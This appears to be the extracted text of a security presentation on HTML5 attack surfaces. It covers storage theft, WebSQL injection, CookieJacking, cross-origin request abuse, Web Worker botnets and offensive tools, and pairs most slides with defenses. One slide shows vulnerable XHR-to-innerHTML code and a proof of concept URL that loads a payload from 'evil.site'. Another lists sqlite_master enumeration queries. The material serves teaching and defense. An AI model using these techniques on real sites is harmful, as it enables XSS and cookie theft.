2. Introduction to HTML5
HTML5 threat model
Vulnerabilities & Defense
Tools
Reference
3. History
HTML1.0——1993.6 Not Standard
HTML 2.0——1995.11 RFC 1866
HTML 3.2——1996.1.14 W3C Recommended Standard
HTML 4.0——1997.12.18 W3C Recommended Standard
HTML 4.01——1999.12.24 W3C Recommended Standard
XHTML——2000.1.20 W3C Recommended Standard
HTML5——2008 First Draft Standard
2012 W3C Candidate Recommendation
4. Features
The three aspects of HTML5
▪ Content HTML
▪ New Tags and Attributes
▪ Presentation of content CSS
▪ Interaction with content JavaScript
▪ Add New API Drag LocalStorage WebWorkers etc
8. XSS abuse with tags and attributes
Hiding URL Code
Stealing from the storage
Injecting and Exploiting WebSQL
ClickJacking &&CookieJacking
Cross Origin Request and postMessage
Client‐side File Includes
Botnet and widgets
9. In:
New tags: <button>,<video>,<audio>,<article>,<footer>,<nav>
New attributes for tags: autocomplete, autofocus, pattern(yes,regex) for
input
New media events
New <canvas> tag for 2D rendering
New form controls for date and time
Geolocation
New selectors
Client-side storage including localStorage, sessionStorage, and WebSQL
Out:
Presentation elements such a <font>, <center>
Presentation attributes including align, border
<frame>,<frameset>
<applet>
Old special effects: <marquee>,<bgsound>
<noscript>
10. Attack:
New XSS Vector
Bypass Black-list Filter
Defense:
Add new tags to Black-list
Change Regex
11.
12. DOM
window.history.back();
window.history.forward();
window.history.go();
HTML5
history.pushState()
▪ history.pushState(state object,title,URL);
history.replaceState()
▪ The same with pushState,but modifies the current
history entry.
15. Type
LocalStorage:for long-term storage
SessionStorage:for the session application(last
when the browser closed)
Differences
Cookies:4k
LocalStorage/ SessionStorage:depends on
browser(usually 5MB)
Support
Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera
10.50
18. Attack
Get the data from the storage(cookie,passwd,etc)
Storage your xss shellcode
Unlimit the path
Defense
Don’t store sensitive data in local storage
Don't use local storage for session identifiers
Stick with cookies and use the HTTPOnly and
Secure flags
19.
20. Database Storage
The same as the Google Gears
Operate
openDatabase("Database Name", "Database Version", "Database
Description", "Estimated Size");
transaction("YOUR SQL STATEMENT HERE");
executeSql();
Type
SQLite (support by WebKit)
21. Attack
Store shellcode
SQL inject
Defense
Strick with the sql operate
Encode the sql result before display
Don’t store sensitive data
23. SQL Injection
Use sqlite_master
▪ SELECT name FROM sqlite_master WHERE type='table'
▪ SELECT sql FROM sqlite_master WHERE
name='table_name'
▪ SELECT sqlite_version()
Select with ?
▪ executeSql("SELECT name FROM stud WHERE id=" +
input_id); False
▪ executeSql("SELECT name FROM stud WHERE id=?",
[input_id]); True
24. Drag and drop basics
Drag Data
the drag feedback image
drag effects
Drag events:
dragstart
dragenter
dragover
dragleave
drag
drop
dragend
28. CookieJacking
Use many technology to steal user’s local cookies
Technology
How to read the local fileiframe+file://
How to detect the state of cookies Clickjacking
How to send cookiesSMB
29.
30. Defense
Use iframe with sandbox
If (top !== window) top.location=
window.location.href;
if (top!=self) top.location.href=self.location.href
33. Defense
Check the postMessage origin
Don’t use innerHTML
▪ Element.innerHTML=e.data;//danger
▪ Element.textContent=e.data;//safe
Don’t use Eval to deal with the mesage
34. Cross-Origin Resource Sharing
▪ Originally Ajax calls were subject to Same Origin Policy
▪ Site A cannot make XMLHttpRequests to Site B
▪ HTML5 makes it possible to make these cross domain calls
▪ Site ASite B(Response must include a header)
▪ Access-Control-Allow-Origin: Site A Must
▪ Access-Control-Allow-Credentials: true | false
▪ Access-Control-Expose-Headers:
▪ etc
38. Code like this:
<html><body><script>
x = new XMLHttpRequest();
x.open("GET",location.hash.substring(1));
x.onreadystatechange=function(){if(x.readyState==4){
document.getElementById("main").innerHTML=x.responseText;}}
x.send();
</script>
<div id=“main”></div>
</body></html>
POC
Introducing Cross Origin Requests http://example.com/#http://evil.site/payload.php
VContents of ‘payload.php’ will be included as HTML within <div id=“main”></div>
New type of XSS!!
39.
40. Web Workers
running scripts in the background independently
Very simple
var w = new Worker("some_script.js");
w.onmessage = function(e) { // do something };
w.terminate()
Access
▪ XHR,navigator object,application cache,spawn other workers!
Can’t access
▪ DOM,window,document objects
41. Attack
Botnet
▪ Application‐level DDoS attacks
▪ Email Spam
▪ Distributed password cracking
Network Scanning
Guessing User’s Private IP Address
▪ Identify the user’s subnet
▪ Identify the IP address
43. HTML5CSdump
enumeration and extraction techniques described
before to obtain all the client-side storage relative
to a certain domain name
JS-Recon
Port Scans
Network Scans
Detecting private IP address
44. Imposter
Steal cookies
Set cookies
Steal Local Shared Objects
Steal stored passwords from FireFox
etc
Shell of the Future
Reverse Web Shell handler
Bypass anti-session hijacking measures
45. Ravan
JavaScript based Distributed Computing system
hashing algorithms
▪ MD5
▪ SHA1
▪ SHA256
▪ SHA512